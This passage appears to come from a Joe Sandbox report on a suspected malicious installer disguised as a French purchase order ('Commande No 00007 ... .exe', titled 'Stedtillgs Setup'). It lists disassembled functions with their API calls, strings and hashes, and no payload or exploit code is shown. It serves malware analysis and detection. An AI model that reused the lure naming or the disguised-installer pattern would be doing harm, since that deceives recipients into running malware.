                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: a8fb8b9bc022ec85cc7451553b5f9f232c4783b0165688009c132a284a7473d9
                                                        • Instruction ID: db1172372b73d17c9e5c842b05e6fc1add0f007f89b28e5155f99bf94e6db886
                                                        • Opcode Fuzzy Hash: a8fb8b9bc022ec85cc7451553b5f9f232c4783b0165688009c132a284a7473d9
                                                        • Instruction Fuzzy Hash: 63F0A772508114ABE700E7749949AEE7768DF51314F60457BE141F60C1D3B84941DB2A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404115 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041A0
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004041B4
                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041D2
                                                        • GetSysColor.USER32(?), ref: 004041E3
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F2
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404201
                                                        • lstrlenA.KERNEL32(?), ref: 00404204
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404213
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404228
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040428A
                                                        • SendMessageA.USER32(00000000), ref: 0040428D
                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042B8
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042F8
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404307
                                                        • SetCursor.USER32(00000000), ref: 00404310
                                                        • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 00404323
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404330
                                                        • SetCursor.USER32(00000000), ref: 00404333
                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040435F
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404373
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: .>e$: Completed$N$open$@@
                                                        • API String ID: 3615053054-4261444726
                                                        • Opcode ID: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                        • Instruction ID: 7e55316eb6edc40c7699564df6a93aee63aedbce2365efaa8751590eb61f664c
                                                        • Opcode Fuzzy Hash: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                        • Instruction Fuzzy Hash: C561A2B1A40305BFEB109F61CC45F6A7B69FB84715F10802AFA05BA2D1C7B8A951CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,Stedtillgs Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$Stedtillgs Setup
                                                        • API String ID: 941294808-2053236795
                                                        • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                        • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                        • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                        • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405A16 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A26
                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A4A
                                                        • GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A53
                                                          • Part of subcall function 004058D4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                          • Part of subcall function 004058D4: lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                        • GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A70
                                                        • wsprintfA.USER32 ref: 00405A8E
                                                        • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405AC9
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AD8
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B10
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B66
                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B78
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405B7F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405B86
                                                          • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                          • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                        • String ID: %s=%s$NUL$[Rename]
                                                        • API String ID: 1265525490-4148678300
                                                        • Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                        • Instruction ID: 2a91906f743b427df7c641563761ed76cd06f16afc5903481ab5df03799b8c64
                                                        • Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                        • Instruction Fuzzy Hash: ED41CFB1604B15BFD2206B615C49F6B3A6CDB45764F14013AFD05B62D2EA7CBC018E7D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405F49 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FA1
                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FB3
                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405FC3
                                                        Strings
                                                        • "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe", xrefs: 00405F85
                                                        • *?|<>/":, xrefs: 00405F91
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F4A, 00405F4F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-1911095825
                                                        • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                        • Instruction ID: 52ce86beafc523711f1768644b20335aaf79eeea50abe94daadfaeac939761d3
                                                        • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                        • Instruction Fuzzy Hash: C811C851808B97A9F73206340C44B77BF99CB5B760F18047BE9C4722C2D67C5C42DA6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404033 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404050
                                                        • GetSysColor.USER32(00000000), ref: 0040406C
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404078
                                                        • SetBkMode.GDI32(?,?), ref: 00404084
                                                        • GetSysColor.USER32(?), ref: 00404097
                                                        • SetBkColor.GDI32(?,?), ref: 004040A7
                                                        • DeleteObject.GDI32(?), ref: 004040C1
                                                        • CreateBrushIndirect.GDI32(?), ref: 004040CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                        • Instruction ID: 9508cbdce8052bc2bd730cf0eefd2a198c0b18875b65dcd903ac07b372545bec
                                                        • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                        • Instruction Fuzzy Hash: 482184B19047449BCB319F78DD08B5BBBF8AF41714F048A29EA96F22E1C738E944CB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                        • GlobalFree.KERNEL32(?), ref: 0040272C
                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                        • String ID:
                                                        • API String ID: 3294113728-0
                                                        • Opcode ID: 46cbf8bf85c08fe0c845a6a349b34ee7b1a6b64c425fa626d610c4ed04b7097c
                                                        • Instruction ID: 503fd3c95f490675627f5e02168e5e633d1b488668870af047a7021cc1d79fd2
                                                        • Opcode Fuzzy Hash: 46cbf8bf85c08fe0c845a6a349b34ee7b1a6b64c425fa626d610c4ed04b7097c
                                                        • Instruction Fuzzy Hash: BF318B71C00128BBCF216FA5CD89DAE7E79EF09364F10423AF524772E1C6795D419BA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403A2C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,Stedtillgs Setup), ref: 00403AC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$.>e$1033$Stedtillgs Setup$Stedtillgs Setup: Completed
                                                        • API String ID: 530164218-3337983272
                                                        • Opcode ID: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                        • Instruction ID: f1b991f97094af788ebc2fc7f50f41b17603f103b5ffb0c1ba3ee096011c9b45
                                                        • Opcode Fuzzy Hash: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                        • Instruction Fuzzy Hash: DE11D1B1B04611ABCB20DF55DC80A377BADEB84716369813FE941A7391C63D9D029EA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                        • GetTickCount.KERNEL32 ref: 00402C10
                                                        • wsprintfA.USER32 ref: 00402C3E
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                          • Part of subcall function 00402BBE: MulDiv.KERNEL32(000063F4,00000064,000084F9), ref: 00402BD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                        • Instruction ID: 2b7602dd897122490efce7636127cf141f752ce9b4a01bbcaa67e469b6673d4c
                                                        • Opcode Fuzzy Hash: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                        • Instruction Fuzzy Hash: 1C01C4B094A214ABE721AF60AF0DEAE776CBB01701B144137F501B12E1C2B8E941C69E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404894 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048AF
                                                        • GetMessagePos.USER32 ref: 004048B7
                                                        • ScreenToClient.USER32(?,?), ref: 004048D1
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E3
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404909
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                        • Instruction ID: 496b0d989960c3cf29f9699654413807f08c541ba74c601a1343b1cc24abed90
                                                        • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                        • Instruction Fuzzy Hash: A9015275D00219BAEB11DBA4DC45FFFBBBCAF55711F10412BBA10B61C0C7B4A5418BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                        • wsprintfA.USER32 ref: 00402B91
                                                        • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
